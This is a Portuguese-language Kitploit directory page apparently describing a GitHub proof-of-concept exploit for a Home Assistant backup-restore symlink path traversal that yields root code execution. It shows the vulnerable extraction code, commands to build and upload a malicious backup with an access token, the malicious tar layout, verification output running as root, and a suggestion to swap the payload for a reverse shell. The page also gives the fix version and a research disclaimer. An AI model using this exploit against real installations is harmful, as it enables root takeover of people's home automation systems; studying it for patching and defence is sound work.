Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-64824-PoC — CVE-2026-64824 — Travessia de caminho por symlink em backup-restore do Home Assistant → RCE como root. Primeiro PoC funcional, verificado em HA 2026.5.4 real (sobrescrita de sitecustomize.py). GHSA-cwh8-w64c-4j5h | Kitploit
Ferramentas/GitHubGitHub/boreas37/cve-2026-64824-poc
Segurança IoTAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebDesenvolvimento de Payloads
GitHubboreas37/cve-2026-64824-poc

CVE-2026-64824-PoC

CVE-2026-64824 — Travessia de caminho por symlink em backup-restore do Home Assistant → RCE como root. Primeiro PoC funcional, verificado em HA 2026.5.4 real (sobrescrita de sitecustomize.py). GHSA-cwh8-w64c-4j5h

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 9 diasAinda não revisado

CVE-2026-64824 — Traversal de Caminho via Symlink no Backup-Restore do Home Assistant Core → RCE

CVSS 8.4 (Crítico) · GHSA-cwh8-w64c-4j5h · CWE-22 / CWE-59

TL;DR

Um atacante autenticado (admin) envia um tar de backup malicioso. O caminho de restauração extrai o homeassistant.tar.gz interno com filter="fully_trusted" e apenas valida os nomes dos membros — nunca os linknames de SYMTYPE. Um symlink apontando para um caminho absoluto (ex.: site-packages/ do Python) é respeitado, então um sitecustomize.py gravado depois dele cai fora do diretório de extração como root (a imagem Docker oficial executa o HA como root). Na próxima inicialização do Python, ele é importado automaticamente → RCE como root.

Verificado (2026-08-10)

✅ Home Assistant Core 2026.5.4 real (Docker, arm64, Python 3.14.2):

root@kitploit:~
POST /api/backup/upload?agent_id=backup.local  → 201 {"backup_id": "..."}
websocket backup/restore                      → executed (config replaced)

$ python3 -c 'print(1)'
$ ls -la /tmp/HA_PWNED_64824
-rw-r--r-- 1 root root 130 ... /tmp/HA_PWNED_64824
$ cat /tmp/HA_PWNED_64824
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),...

✅ sitecustomize.py foi parar em /usr/local/lib/python3.14/site-packages/ (pertencente ao root)

✅ Teste negativo: o tarfile do Python 3.14.5 rejeita symlinks absolutos (FileExistsError); o Python 3.14.2 (incluído no HA 2026.5.x) os extrai — é por isso que versões mais antigas são exploráveis. Corrigido no HA 2026.7.0.

A Falha

homeassistant/backup_restore.py (~v2026.5.x):

root@kitploit:~
istf.extractall(
    path=Path(tempdir, "homeassistant"),
    members=securetar.secure_path(istf),   # validates member.name only!
    filter="fully_trusted",
)
# ... shutil.copytree(Path(tempdir, "homeassistant", "data"), config_dir, ...)

secure_path() rejeita nomes absolutos e travessia .., mas um membro SYMTYPE com um nome benigno + linkname absoluto passa pelo filtro inalterado, e fully_trusted diz ao tarfile para não fiscalizar isso.

Exploração

root@kitploit:~
# 1. Build malicious backup from a real HA backup
python3 CVE-2026-64824.py --build --backup real_backup.tar -o evil.tar \
    --link-target /usr/local/lib/python3.14/site-packages/

# 2. Upload + restore (token = long-lived access token)
python3 CVE-2026-64824.py --target http://ha:8123 --token <LLAT> --backup real_backup.tar

Formato do backup (v2, corresponde a backups reais do HA):

root@kitploit:~
outer: ./backup.json            {version:2, type:partial, compressed:true, protected:false}
outer: homeassistant.tar.gz
inner: data/evil_link           -> /usr/local/lib/python3.14/site-packages/   (SYMTYPE)
inner: data/evil_link/sitecustomize.py                                       (payload)

Qualquer inicialização de processo Python (reinício do HA, python3 ... no contêiner) aciona o sitecustomize.py — que executa id > /tmp/HA_PWNED_64824 como root. Troque o payload por um reverse shell para controle total.

Impacto

  • RCE completa como root em instalações Home Assistant OS/Container
  • A restauração de backup é acessível a qualquer admin autenticado (e a usuários com acesso a backup/restore), inclusive pelo fluxo "Restaurar backup" da interface
  • Como a restauração substitui o diretório de configuração primeiro, o ataque também funciona mesmo quando a configuração está bloqueada de outras formas

Correção

Atualize para o HA 2026.7.0+ (a restauração agora usa um filtro tar estrito que rejeita entradas de symlink que escapem do diretório de extração).

Cronologia

  • 2026-07: Vulnerabilidade divulgada pela VulnCheck, GHSA-cwh8-w64c-4j5h publicada
  • 2026-08-10: Este PoC — primeiro exploit público funcional com verificação completa de RCE como root em uma instância real 2026.5.4
  • Nenhuma exploração ativa observada na data da publicação

Aviso Legal

Somente para fins de pesquisa/educação. A vulnerabilidade já foi divulgada (GHSA-cwh8-w64c-4j5h) e corrigida na versão 2026.7.0; este repositório demonstra a cadeia de exploração para defensores e pesquisadores.

Baixar ferramenta